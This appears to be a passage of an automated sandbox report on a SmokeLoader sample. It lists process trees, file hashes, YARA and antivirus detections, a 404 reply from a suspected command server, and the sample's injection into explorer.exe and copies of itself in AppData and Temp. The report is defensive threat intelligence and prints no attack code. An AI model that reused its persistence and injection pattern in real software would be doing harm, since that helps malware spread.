                  Data Ascii: 11a<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at data-host-coin-8.com Port 80</address></body></html>0


                  Code Manipulations

                  Statistics

                  Behavior

                  Click to jump to process

                  System Behavior

                  Analysis Process: UZ6FEqlix4.exe PID: 6160 Parent PID: 5708

                  General

                  Start time:13:54:05
                  Start date:28/12/2021
                  Path:C:\Users\user\Desktop\UZ6FEqlix4.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Users\user\Desktop\UZ6FEqlix4.exe"
                  Imagebase:0x400000
                  File size:339456 bytes
                  MD5 hash:5E0ED8966761E70EE0B8DCD141AAFB4C
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:low

                  Analysis Process: UZ6FEqlix4.exe PID: 6384 Parent PID: 6160

                  General

                  Start time:13:54:07
                  Start date:28/12/2021
                  Path:C:\Users\user\Desktop\UZ6FEqlix4.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Users\user\Desktop\UZ6FEqlix4.exe"
                  Imagebase:0x400000
                  File size:339456 bytes
                  MD5 hash:5E0ED8966761E70EE0B8DCD141AAFB4C
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000001.00000002.733146103.0000000000540000.00000004.00000001.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000001.00000002.733351124.0000000002051000.00000004.00020000.sdmp, Author: Joe Security
                  Reputation:low

                  Analysis Process: explorer.exe PID: 3424 Parent PID: 6384

                  General

                  Start time:13:54:13
                  Start date:28/12/2021
                  Path:C:\Windows\explorer.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\Explorer.EXE
                  Imagebase:0x7ff6fee60000
                  File size:3933184 bytes
                  MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000005.00000000.720297741.0000000004F41000.00000020.00020000.sdmp, Author: Joe Security
                  Reputation:high

                  Analysis Process: eveggtb PID: 7080 Parent PID: 968

                  General

                  Start time:13:54:47
                  Start date:28/12/2021
                  Path:C:\Users\user\AppData\Roaming\eveggtb
                  Wow64 process (32bit):true
                  Commandline:C:\Users\user\AppData\Roaming\eveggtb
                  Imagebase:0x400000
                  File size:339456 bytes
                  MD5 hash:5E0ED8966761E70EE0B8DCD141AAFB4C
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Antivirus matches:
                  • Detection: 100%, Joe Sandbox ML
                  • Detection: 20%, Metadefender, Browse
                  • Detection: 67%, ReversingLabs
                  Reputation:low

                  Analysis Process: eveggtb PID: 4720 Parent PID: 7080

                  General

                  Start time:13:54:49
                  Start date:28/12/2021
                  Path:C:\Users\user\AppData\Roaming\eveggtb
                  Wow64 process (32bit):true
                  Commandline:C:\Users\user\AppData\Roaming\eveggtb
                  Imagebase:0x400000
                  File size:339456 bytes
                  MD5 hash:5E0ED8966761E70EE0B8DCD141AAFB4C
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000000B.00000002.781213827.00000000005A1000.00000004.00020000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000000B.00000002.781100610.0000000000460000.00000004.00000001.sdmp, Author: Joe Security
                  Reputation:low

                  Analysis Process: 411F.exe PID: 6684 Parent PID: 3424

                  General

                  Start time:13:56:03
                  Start date:28/12/2021
                  Path:C:\Users\user\AppData\Local\Temp\411F.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Users\user\AppData\Local\Temp\411F.exe
                  Imagebase:0x400000
                  File size:339456 bytes
                  MD5 hash:5E0ED8966761E70EE0B8DCD141AAFB4C
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:low

                  Analysis Process: 411F.exe PID: 5956 Parent PID: 6684

                  General

                  Start time:13:56:06
                  Start date:28/12/2021
                  Path:C:\Users\user\AppData\Local\Temp\411F.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Users\user\AppData\Local\Temp\411F.exe
                  Imagebase:0x400000
                  File size:339456 bytes
                  MD5 hash:5E0ED8966761E70EE0B8DCD141AAFB4C
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:low

                  Disassembly

                  Code Analysis

                  Reset < >